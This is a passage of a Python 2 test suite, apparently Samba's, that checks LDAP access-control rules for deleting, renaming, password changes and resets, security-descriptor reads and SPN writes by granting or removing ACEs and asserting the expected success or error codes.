self.fail()
def test_delete_u2(self):
"""User's group has RIGHT_DELETE to another User object"""
user_dn = self.get_user_dn("test_delete_user1")
# Create user that we try to delete
self.ldb_admin.newuser("test_delete_user1", self.user_pass)
mod = "(A;;SD;;;AU)"
self.sd_utils.dacl_add_ace(user_dn, mod)
# Try to delete User object
self.ldb_user.delete(user_dn)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % user_dn)
self.assertEqual(len(res), 0)
def test_delete_u3(self):
"""User indentified by SID has RIGHT_DELETE to another User object"""
user_dn = self.get_user_dn("test_delete_user1")
# Create user that we try to delete
self.ldb_admin.newuser("test_delete_user1", self.user_pass)
mod = "(A;;SD;;;%s)" % self.sd_utils.get_object_sid(self.get_user_dn(self.regular_user))
self.sd_utils.dacl_add_ace(user_dn, mod)
# Try to delete User object
self.ldb_user.delete(user_dn)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % user_dn)
self.assertEqual(len(res), 0)
def test_delete_anonymous(self):
"""Test add operation with anonymous user"""
anonymous = SamDB(url=ldaphost, credentials=self.creds_tmp, lp=lp)
self.ldb_admin.newuser("test_anonymous", "samba123@")
try:
anonymous.delete(self.get_user_dn("test_anonymous"))
except LdbError, (num, _):
self.assertEquals(num, ERR_OPERATIONS_ERROR)
else:
self.fail()
#tests on ldap rename operations
class AclRenameTests(AclTests):
def setUp(self):
super(AclRenameTests, self).setUp()
self.regular_user = "acl_rename_user1"
self.ou1 = "OU=test_rename_ou1"
self.ou2 = "OU=test_rename_ou2"
self.ou3 = "OU=test_rename_ou3,%s" % self.ou2
self.testuser1 = "test_rename_user1"
self.testuser2 = "test_rename_user2"
self.testuser3 = "test_rename_user3"
self.testuser4 = "test_rename_user4"
self.testuser5 = "test_rename_user5"
# Create regular user
self.ldb_admin.newuser(self.regular_user, self.user_pass)
self.ldb_user = self.get_ldb_connection(self.regular_user, self.user_pass)
def tearDown(self):
super(AclRenameTests, self).tearDown()
# Rename OU3
delete_force(self.ldb_admin, "CN=%s,%s,%s" % (self.testuser1, self.ou3, self.base_dn))
delete_force(self.ldb_admin, "CN=%s,%s,%s" % (self.testuser2, self.ou3, self.base_dn))
delete_force(self.ldb_admin, "CN=%s,%s,%s" % (self.testuser5, self.ou3, self.base_dn))
delete_force(self.ldb_admin, "%s,%s" % (self.ou3, self.base_dn))
# Rename OU2
delete_force(self.ldb_admin, "CN=%s,%s,%s" % (self.testuser1, self.ou2, self.base_dn))
delete_force(self.ldb_admin, "CN=%s,%s,%s" % (self.testuser2, self.ou2, self.base_dn))
delete_force(self.ldb_admin, "CN=%s,%s,%s" % (self.testuser5, self.ou2, self.base_dn))
delete_force(self.ldb_admin, "%s,%s" % (self.ou2, self.base_dn))
# Rename OU1
delete_force(self.ldb_admin, "CN=%s,%s,%s" % (self.testuser1, self.ou1, self.base_dn))
delete_force(self.ldb_admin, "CN=%s,%s,%s" % (self.testuser2, self.ou1, self.base_dn))
delete_force(self.ldb_admin, "CN=%s,%s,%s" % (self.testuser5, self.ou1, self.base_dn))
delete_force(self.ldb_admin, "OU=test_rename_ou3,%s,%s" % (self.ou1, self.base_dn))
delete_force(self.ldb_admin, "%s,%s" % (self.ou1, self.base_dn))
delete_force(self.ldb_admin, self.get_user_dn(self.regular_user))
def test_rename_u1(self):
"""Regular user fails to rename 'User object' within single OU"""
# Create OU structure
self.ldb_admin.create_ou("OU=test_rename_ou1," + self.base_dn)
self.ldb_admin.newuser(self.testuser1, self.user_pass, userou=self.ou1)
try:
self.ldb_user.rename("CN=%s,%s,%s" % (self.testuser1, self.ou1, self.base_dn), \
"CN=%s,%s,%s" % (self.testuser5, self.ou1, self.base_dn))
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
self.fail()
def test_rename_u2(self):
"""Grant WRITE_PROPERTY to AU so regular user can rename 'User object' within single OU"""
ou_dn = "OU=test_rename_ou1," + self.base_dn
user_dn = "CN=test_rename_user1," + ou_dn
rename_user_dn = "CN=test_rename_user5," + ou_dn
# Create OU structure
self.ldb_admin.create_ou(ou_dn)
self.ldb_admin.newuser(self.testuser1, self.user_pass, userou=self.ou1)
mod = "(A;;WP;;;AU)"
self.sd_utils.dacl_add_ace(user_dn, mod)
# Rename 'User object' having WP to AU
self.ldb_user.rename(user_dn, rename_user_dn)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % user_dn)
self.assertEqual(len(res), 0)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % rename_user_dn)
self.assertNotEqual(len(res), 0)
def test_rename_u3(self):
"""Test rename with rights granted to 'User object' SID"""
ou_dn = "OU=test_rename_ou1," + self.base_dn
user_dn = "CN=test_rename_user1," + ou_dn
rename_user_dn = "CN=test_rename_user5," + ou_dn
# Create OU structure
self.ldb_admin.create_ou(ou_dn)
self.ldb_admin.newuser(self.testuser1, self.user_pass, userou=self.ou1)
sid = self.sd_utils.get_object_sid(self.get_user_dn(self.regular_user))
mod = "(A;;WP;;;%s)" % str(sid)
self.sd_utils.dacl_add_ace(user_dn, mod)
# Rename 'User object' having WP to AU
self.ldb_user.rename(user_dn, rename_user_dn)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % user_dn)
self.assertEqual(len(res), 0)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % rename_user_dn)
self.assertNotEqual(len(res), 0)
def test_rename_u4(self):
"""Rename 'User object' cross OU with WP, SD and CC right granted on reg. user to AU"""
ou1_dn = "OU=test_rename_ou1," + self.base_dn
ou2_dn = "OU=test_rename_ou2," + self.base_dn
user_dn = "CN=test_rename_user2," + ou1_dn
rename_user_dn = "CN=test_rename_user5," + ou2_dn
# Create OU structure
self.ldb_admin.create_ou(ou1_dn)
self.ldb_admin.create_ou(ou2_dn)
self.ldb_admin.newuser(self.testuser2, self.user_pass, userou=self.ou1)
mod = "(A;;WPSD;;;AU)"
self.sd_utils.dacl_add_ace(user_dn, mod)
mod = "(A;;CC;;;AU)"
self.sd_utils.dacl_add_ace(ou2_dn, mod)
# Rename 'User object' having SD and CC to AU
self.ldb_user.rename(user_dn, rename_user_dn)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % user_dn)
self.assertEqual(len(res), 0)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % rename_user_dn)
self.assertNotEqual(len(res), 0)
def test_rename_u5(self):
"""Test rename with rights granted to 'User object' SID"""
ou1_dn = "OU=test_rename_ou1," + self.base_dn
ou2_dn = "OU=test_rename_ou2," + self.base_dn
user_dn = "CN=test_rename_user2," + ou1_dn
rename_user_dn = "CN=test_rename_user5," + ou2_dn
# Create OU structure
self.ldb_admin.create_ou(ou1_dn)
self.ldb_admin.create_ou(ou2_dn)
self.ldb_admin.newuser(self.testuser2, self.user_pass, userou=self.ou1)
sid = self.sd_utils.get_object_sid(self.get_user_dn(self.regular_user))
mod = "(A;;WPSD;;;%s)" % str(sid)
self.sd_utils.dacl_add_ace(user_dn, mod)
mod = "(A;;CC;;;%s)" % str(sid)
self.sd_utils.dacl_add_ace(ou2_dn, mod)
# Rename 'User object' having SD and CC to AU
self.ldb_user.rename(user_dn, rename_user_dn)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % user_dn)
self.assertEqual(len(res), 0)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % rename_user_dn)
self.assertNotEqual(len(res), 0)
def test_rename_u6(self):
"""Rename 'User object' cross OU with WP, DC and CC right granted on OU & user to AU"""
ou1_dn = "OU=test_rename_ou1," + self.base_dn
ou2_dn = "OU=test_rename_ou2," + self.base_dn
user_dn = "CN=test_rename_user2," + ou1_dn
rename_user_dn = "CN=test_rename_user2," + ou2_dn
# Create OU structure
self.ldb_admin.create_ou(ou1_dn)
self.ldb_admin.create_ou(ou2_dn)
#mod = "(A;CI;DCWP;;;AU)"
mod = "(A;;DC;;;AU)"
self.sd_utils.dacl_add_ace(ou1_dn, mod)
mod = "(A;;CC;;;AU)"
self.sd_utils.dacl_add_ace(ou2_dn, mod)
self.ldb_admin.newuser(self.testuser2, self.user_pass, userou=self.ou1)
mod = "(A;;WP;;;AU)"
self.sd_utils.dacl_add_ace(user_dn, mod)
# Rename 'User object' having SD and CC to AU
self.ldb_user.rename(user_dn, rename_user_dn)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % user_dn)
self.assertEqual(len(res), 0)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % rename_user_dn)
self.assertNotEqual(len(res), 0)
def test_rename_u7(self):
"""Rename 'User object' cross OU (second level) with WP, DC and CC right granted on OU to AU"""
ou1_dn = "OU=test_rename_ou1," + self.base_dn
ou2_dn = "OU=test_rename_ou2," + self.base_dn
ou3_dn = "OU=test_rename_ou3," + ou2_dn
user_dn = "CN=test_rename_user2," + ou1_dn
rename_user_dn = "CN=test_rename_user5," + ou3_dn
# Create OU structure
self.ldb_admin.create_ou(ou1_dn)
self.ldb_admin.create_ou(ou2_dn)
self.ldb_admin.create_ou(ou3_dn)
mod = "(A;CI;WPDC;;;AU)"
self.sd_utils.dacl_add_ace(ou1_dn, mod)
mod = "(A;;CC;;;AU)"
self.sd_utils.dacl_add_ace(ou3_dn, mod)
self.ldb_admin.newuser(self.testuser2, self.user_pass, userou=self.ou1)
# Rename 'User object' having SD and CC to AU
self.ldb_user.rename(user_dn, rename_user_dn)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % user_dn)
self.assertEqual(len(res), 0)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % rename_user_dn)
self.assertNotEqual(len(res), 0)
def test_rename_u8(self):
"""Test rename on an object with and without modify access on the RDN attribute"""
ou1_dn = "OU=test_rename_ou1," + self.base_dn
ou2_dn = "OU=test_rename_ou2," + ou1_dn
ou3_dn = "OU=test_rename_ou3," + ou1_dn
# Create OU structure
self.ldb_admin.create_ou(ou1_dn)
self.ldb_admin.create_ou(ou2_dn)
sid = self.sd_utils.get_object_sid(self.get_user_dn(self.regular_user))
mod = "(OA;;WP;bf967a0e-0de6-11d0-a285-00aa003049e2;;%s)" % str(sid)
self.sd_utils.dacl_add_ace(ou2_dn, mod)
mod = "(OD;;WP;bf9679f0-0de6-11d0-a285-00aa003049e2;;%s)" % str(sid)
self.sd_utils.dacl_add_ace(ou2_dn, mod)
try:
self.ldb_user.rename(ou2_dn, ou3_dn)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
# This rename operation should always throw ERR_INSUFFICIENT_ACCESS_RIGHTS
self.fail()
sid = self.sd_utils.get_object_sid(self.get_user_dn(self.regular_user))
mod = "(A;;WP;bf9679f0-0de6-11d0-a285-00aa003049e2;;%s)" % str(sid)
self.sd_utils.dacl_add_ace(ou2_dn, mod)
self.ldb_user.rename(ou2_dn, ou3_dn)
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s)" % ou2_dn)
self.assertEqual(len(res), 0)
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s)" % ou3_dn)
self.assertNotEqual(len(res), 0)
#tests on Control Access Rights
class AclCARTests(AclTests):
def setUp(self):
super(AclCARTests, self).setUp()
self.user_with_wp = "acl_car_user1"
self.user_with_pc = "acl_car_user2"
self.ldb_admin.newuser(self.user_with_wp, self.user_pass)
self.ldb_admin.newuser(self.user_with_pc, self.user_pass)
self.ldb_user = self.get_ldb_connection(self.user_with_wp, self.user_pass)
self.ldb_user2 = self.get_ldb_connection(self.user_with_pc, self.user_pass)
def tearDown(self):
super(AclCARTests, self).tearDown()
delete_force(self.ldb_admin, self.get_user_dn(self.user_with_wp))
delete_force(self.ldb_admin, self.get_user_dn(self.user_with_pc))
def test_change_password1(self):
"""Try a password change operation without any CARs given"""
#users have change password by default - remove for negative testing
desc = self.sd_utils.read_sd_on_dn(self.get_user_dn(self.user_with_wp))
sddl = desc.as_sddl(self.domain_sid)
sddl = sddl.replace("(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;WD)", "")
sddl = sddl.replace("(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;PS)", "")
self.sd_utils.modify_sd_on_dn(self.get_user_dn(self.user_with_wp), sddl)
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
delete: unicodePwd
unicodePwd:: """ + base64.b64encode("\"samba123@\"".encode('utf-16-le')) + """
add: unicodePwd
unicodePwd:: """ + base64.b64encode("\"thatsAcomplPASS2\"".encode('utf-16-le')) + """
""")
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
else:
# for some reason we get constraint violation instead of insufficient access error
self.fail()
def test_change_password2(self):
"""Make sure WP has no influence"""
desc = self.sd_utils.read_sd_on_dn(self.get_user_dn(self.user_with_wp))
sddl = desc.as_sddl(self.domain_sid)
sddl = sddl.replace("(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;WD)", "")
sddl = sddl.replace("(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;PS)", "")
self.sd_utils.modify_sd_on_dn(self.get_user_dn(self.user_with_wp), sddl)
mod = "(A;;WP;;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
desc = self.sd_utils.read_sd_on_dn(self.get_user_dn(self.user_with_wp))
sddl = desc.as_sddl(self.domain_sid)
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
delete: unicodePwd
unicodePwd:: """ + base64.b64encode("\"samba123@\"".encode('utf-16-le')) + """
add: unicodePwd
unicodePwd:: """ + base64.b64encode("\"thatsAcomplPASS2\"".encode('utf-16-le')) + """
""")
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
else:
# for some reason we get constraint violation instead of insufficient access error
self.fail()
def test_change_password3(self):
"""Make sure WP has no influence"""
mod = "(D;;WP;;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
desc = self.sd_utils.read_sd_on_dn(self.get_user_dn(self.user_with_wp))
sddl = desc.as_sddl(self.domain_sid)
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
delete: unicodePwd
unicodePwd:: """ + base64.b64encode("\"samba123@\"".encode('utf-16-le')) + """
add: unicodePwd
unicodePwd:: """ + base64.b64encode("\"thatsAcomplPASS2\"".encode('utf-16-le')) + """
""")
def test_change_password5(self):
"""Make sure rights have no influence on dBCSPwd"""
desc = self.sd_utils.read_sd_on_dn(self.get_user_dn(self.user_with_wp))
sddl = desc.as_sddl(self.domain_sid)
sddl = sddl.replace("(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;WD)", "")
sddl = sddl.replace("(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;PS)", "")
self.sd_utils.modify_sd_on_dn(self.get_user_dn(self.user_with_wp), sddl)
mod = "(D;;WP;;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
delete: dBCSPwd
dBCSPwd: XXXXXXXXXXXXXXXX
add: dBCSPwd
dBCSPwd: YYYYYYYYYYYYYYYY
""")
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
else:
self.fail()
def test_change_password6(self):
"""Test uneven delete/adds"""
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
delete: userPassword
userPassword: thatsAcomplPASS1
delete: userPassword
userPassword: thatsAcomplPASS1
add: userPassword
userPassword: thatsAcomplPASS2
""")
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
self.fail()
mod = "(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
delete: userPassword
userPassword: thatsAcomplPASS1
delete: userPassword
userPassword: thatsAcomplPASS1
add: userPassword
userPassword: thatsAcomplPASS2
""")
# This fails on Windows 2000 domain level with constraint violation
except LdbError, (num, _):
self.assertTrue(num == ERR_CONSTRAINT_VIOLATION or
num == ERR_UNWILLING_TO_PERFORM)
else:
self.fail()
def test_change_password7(self):
"""Try a password change operation without any CARs given"""
#users have change password by default - remove for negative testing
desc = self.sd_utils.read_sd_on_dn(self.get_user_dn(self.user_with_wp))
sddl = desc.as_sddl(self.domain_sid)
self.sd_utils.modify_sd_on_dn(self.get_user_dn(self.user_with_wp), sddl)
#first change our own password
self.ldb_user2.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_pc) + """
changetype: modify
delete: unicodePwd
unicodePwd:: """ + base64.b64encode("\"samba123@\"".encode('utf-16-le')) + """
add: unicodePwd
unicodePwd:: """ + base64.b64encode("\"thatsAcomplPASS1\"".encode('utf-16-le')) + """
""")
#then someone else's
self.ldb_user2.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
delete: unicodePwd
unicodePwd:: """ + base64.b64encode("\"samba123@\"".encode('utf-16-le')) + """
add: unicodePwd
unicodePwd:: """ + base64.b64encode("\"thatsAcomplPASS2\"".encode('utf-16-le')) + """
""")
def test_reset_password1(self):
"""Try a user password reset operation (unicodePwd) before and after granting CAR"""
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
replace: unicodePwd
unicodePwd:: """ + base64.b64encode("\"thatsAcomplPASS1\"".encode('utf-16-le')) + """
""")
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
self.fail()
mod = "(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
replace: unicodePwd
unicodePwd:: """ + base64.b64encode("\"thatsAcomplPASS1\"".encode('utf-16-le')) + """
""")
def test_reset_password2(self):
"""Try a user password reset operation (userPassword) before and after granting CAR"""
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
replace: userPassword
userPassword: thatsAcomplPASS1
""")
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
self.fail()
mod = "(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
replace: userPassword
userPassword: thatsAcomplPASS1
""")
# This fails on Windows 2000 domain level with constraint violation
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
def test_reset_password3(self):
"""Grant WP and see what happens (unicodePwd)"""
mod = "(A;;WP;;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
replace: unicodePwd
unicodePwd:: """ + base64.b64encode("\"thatsAcomplPASS1\"".encode('utf-16-le')) + """
""")
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
self.fail()
def test_reset_password4(self):
"""Grant WP and see what happens (userPassword)"""
mod = "(A;;WP;;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
replace: userPassword
userPassword: thatsAcomplPASS1
""")
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
self.fail()
def test_reset_password5(self):
"""Explicitly deny WP but grant CAR (unicodePwd)"""
mod = "(D;;WP;;;PS)(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
replace: unicodePwd
unicodePwd:: """ + base64.b64encode("\"thatsAcomplPASS1\"".encode('utf-16-le')) + """
""")
def test_reset_password6(self):
"""Explicitly deny WP but grant CAR (userPassword)"""
mod = "(D;;WP;;;PS)(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
replace: userPassword
userPassword: thatsAcomplPASS1
""")
# This fails on Windows 2000 domain level with constraint violation
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
class AclExtendedTests(AclTests):
def setUp(self):
super(AclExtendedTests, self).setUp()
#regular user, will be the creator
self.u1 = "ext_u1"
#regular user
self.u2 = "ext_u2"
#admin user
self.u3 = "ext_u3"
self.ldb_admin.newuser(self.u1, self.user_pass)
self.ldb_admin.newuser(self.u2, self.user_pass)
self.ldb_admin.newuser(self.u3, self.user_pass)
self.ldb_admin.add_remove_group_members("Domain Admins", self.u3,
add_members_operation=True)
self.ldb_user1 = self.get_ldb_connection(self.u1, self.user_pass)
self.ldb_user2 = self.get_ldb_connection(self.u2, self.user_pass)
self.ldb_user3 = self.get_ldb_connection(self.u3, self.user_pass)
self.user_sid1 = self.sd_utils.get_object_sid(self.get_user_dn(self.u1))
self.user_sid2 = self.sd_utils.get_object_sid(self.get_user_dn(self.u2))
def tearDown(self):
super(AclExtendedTests, self).tearDown()
delete_force(self.ldb_admin, self.get_user_dn(self.u1))
delete_force(self.ldb_admin, self.get_user_dn(self.u2))
delete_force(self.ldb_admin, self.get_user_dn(self.u3))
delete_force(self.ldb_admin, "CN=ext_group1,OU=ext_ou1," + self.base_dn)
delete_force(self.ldb_admin, "ou=ext_ou1," + self.base_dn)
def test_ntSecurityDescriptor(self):
#create empty ou
self.ldb_admin.create_ou("ou=ext_ou1," + self.base_dn)
#give u1 Create children access
mod = "(A;;CC;;;%s)" % str(self.user_sid1)
self.sd_utils.dacl_add_ace("OU=ext_ou1," + self.base_dn, mod)
mod = "(A;;LC;;;%s)" % str(self.user_sid2)
self.sd_utils.dacl_add_ace("OU=ext_ou1," + self.base_dn, mod)
#create a group under that, grant RP to u2
self.ldb_user1.newgroup("ext_group1", groupou="OU=ext_ou1", grouptype=4)
mod = "(A;;RP;;;%s)" % str(self.user_sid2)
self.sd_utils.dacl_add_ace("CN=ext_group1,OU=ext_ou1," + self.base_dn, mod)
#u2 must not read the descriptor
res = self.ldb_user2.search("CN=ext_group1,OU=ext_ou1," + self.base_dn,
SCOPE_BASE, None, ["nTSecurityDescriptor"])
self.assertNotEqual(len(res), 0)
self.assertFalse("nTSecurityDescriptor" in res[0].keys())
#grant RC to u2 - still no access
mod = "(A;;RC;;;%s)" % str(self.user_sid2)
self.sd_utils.dacl_add_ace("CN=ext_group1,OU=ext_ou1," + self.base_dn, mod)
res = self.ldb_user2.search("CN=ext_group1,OU=ext_ou1," + self.base_dn,
SCOPE_BASE, None, ["nTSecurityDescriptor"])
self.assertNotEqual(len(res), 0)
self.assertFalse("nTSecurityDescriptor" in res[0].keys())
#u3 is member of administrators group, should be able to read sd
res = self.ldb_user3.search("CN=ext_group1,OU=ext_ou1," + self.base_dn,
SCOPE_BASE, None, ["nTSecurityDescriptor"])
self.assertEqual(len(res),1)
self.assertTrue("nTSecurityDescriptor" in res[0].keys())
class AclSPNTests(AclTests):
def setUp(self):
super(AclSPNTests, self).setUp()
self.dcname = "TESTSRV8"
self.rodcname = "TESTRODC8"
self.computername = "testcomp8"
self.test_user = "spn_test_user8"
self.computerdn = "CN=%s,CN=computers,%s" % (self.computername, self.base_dn)
self.dc_dn = "CN=%s,OU=Domain Controllers,%s" % (self.dcname, self.base_dn)
self.site = "Default-First-Site-Name"
self.rodcctx = dc_join(server=host, creds=creds, lp=lp,
site=self.site, netbios_name=self.rodcname, targetdir=None,
domain=None)
self.dcctx = dc_join(server=host, creds=creds, lp=lp, site=self.site,
netbios_name=self.dcname, targetdir=None, domain=None)
self.ldb_admin.newuser(self.test_user, self.user_pass)
self.ldb_user1 = self.get_ldb_connection(self.test_user, self.user_pass)
self.user_sid1 = self.sd_utils.get_object_sid(self.get_user_dn(self.test_user))
self.create_computer(self.computername, self.dcctx.dnsdomain)
self.create_rodc(self.rodcctx)
self.create_dc(self.dcctx)
def tearDown(self):
super(AclSPNTests, self).tearDown()
self.rodcctx.cleanup_old_join()
self.dcctx.cleanup_old_join()
delete_force(self.ldb_admin, "cn=%s,cn=computers,%s" % (self.computername, self.base_dn))
delete_force(self.ldb_admin, self.get_user_dn(self.test_user))
def replace_spn(self, _ldb, dn, spn):
print "Setting spn %s on %s" % (spn, dn)
res = self.ldb_admin.search(dn, expression="(objectClass=*)",
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
if "servicePrincipalName" in res[0].keys():
flag = FLAG_MOD_REPLACE
else:
flag = FLAG_MOD_ADD
msg = Message()
msg.dn = Dn(self.ldb_admin, dn)
msg["servicePrincipalName"] = MessageElement(spn, flag,
"servicePrincipalName")
_ldb.modify(msg)
def create_computer(self, computername, domainname):
dn = "CN=%s,CN=computers,%s" % (computername, self.base_dn)
samaccountname = computername + "$"
dnshostname = "%s.%s" % (computername, domainname)
self.ldb_admin.add({
"dn": dn,
"objectclass": "computer",
"sAMAccountName": samaccountname,
"userAccountControl": str(samba.dsdb.UF_WORKSTATION_TRUST_ACCOUNT),
"dNSHostName": dnshostname})
# same as for join_RODC, but do not set any SPNs
def create_rodc(self, ctx):
ctx.krbtgt_dn = "CN=krbtgt_%s,CN=Users,%s" % (ctx.myname, ctx.base_dn)
ctx.never_reveal_sid = [ "<SID=%s-%s>" % (ctx.domsid, security.DOMAIN_RID_RODC_DENY),
"<SID=%s>" % security.SID_BUILTIN_ADMINISTRATORS,
"<SID=%s>" % security.SID_BUILTIN_SERVER_OPERATORS,
"<SID=%s>" % security.SID_BUILTIN_BACKUP_OPERATORS,
"<SID=%s>" % security.SID_BUILTIN_ACCOUNT_OPERATORS ]
ctx.reveal_sid = "<SID=%s-%s>" % (ctx.domsid, security.DOMAIN_RID_RODC_ALLOW)
mysid = ctx.get_mysid()
admin_dn = "<SID=%s>" % mysid
ctx.managedby = admin_dn
ctx.userAccountControl = (samba.dsdb.UF_WORKSTATION_TRUST_ACCOUNT |
samba.dsdb.UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION |
samba.dsdb.UF_PARTIAL_SECRETS_ACCOUNT)
ctx.connection_dn = "CN=RODC Connection (FRS),%s" % ctx.ntds_dn
ctx.secure_channel_type = misc.SEC_CHAN_RODC
ctx.RODC = True
ctx.replica_flags = (drsuapi.DRSUAPI_DRS_INIT_SYNC |
drsuapi.DRSUAPI_DRS_PER_SYNC |
drsuapi.DRSUAPI_DRS_GET_ANC |
drsuapi.DRSUAPI_DRS_NEVER_SYNCED |
drsuapi.DRSUAPI_DRS_SPECIAL_SECRET_PROCESSING)
ctx.join_add_objects()
def create_dc(self, ctx):
ctx.userAccountControl = samba.dsdb.UF_SERVER_TRUST_ACCOUNT | samba.dsdb.UF_TRUSTED_FOR_DELEGATION
ctx.secure_channel_type = misc.SEC_CHAN_BDC
ctx.replica_flags = (drsuapi.DRSUAPI_DRS_WRIT_REP |
drsuapi.DRSUAPI_DRS_INIT_SYNC |
drsuapi.DRSUAPI_DRS_PER_SYNC |
drsuapi.DRSUAPI_DRS_FULL_SYNC_IN_PROGRESS |
drsuapi.DRSUAPI_DRS_NEVER_SYNCED)
ctx.join_add_objects()
def dc_spn_test(self, ctx):
netbiosdomain = self.dcctx.get_domain_name()
try:
self.replace_spn(self.ldb_user1, ctx.acct_dn, "HOST/%s/%s" % (ctx.myname, netbiosdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
mod = "(OA;;SW;f3a64788-5306-11d1-a9c5-0000f80367c1;;%s)" % str(self.user_sid1)
self.sd_utils.dacl_add_ace(ctx.acct_dn, mod)
self.replace_spn(self.ldb_user1, ctx.acct_dn, "HOST/%s/%s" % (ctx.myname, netbiosdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "HOST/%s" % (ctx.myname))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "HOST/%s.%s/%s" %
(ctx.myname, ctx.dnsdomain, netbiosdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "HOST/%s/%s" % (ctx.myname, ctx.dnsdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "HOST/%s.%s/%s" %
(ctx.myname, ctx.dnsdomain, ctx.dnsdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "GC/%s.%s/%s" %
(ctx.myname, ctx.dnsdomain, ctx.dnsdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "ldap/%s/%s" % (ctx.myname, netbiosdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "ldap/%s.%s/%s" %
(ctx.myname, ctx.dnsdomain, netbiosdomain))
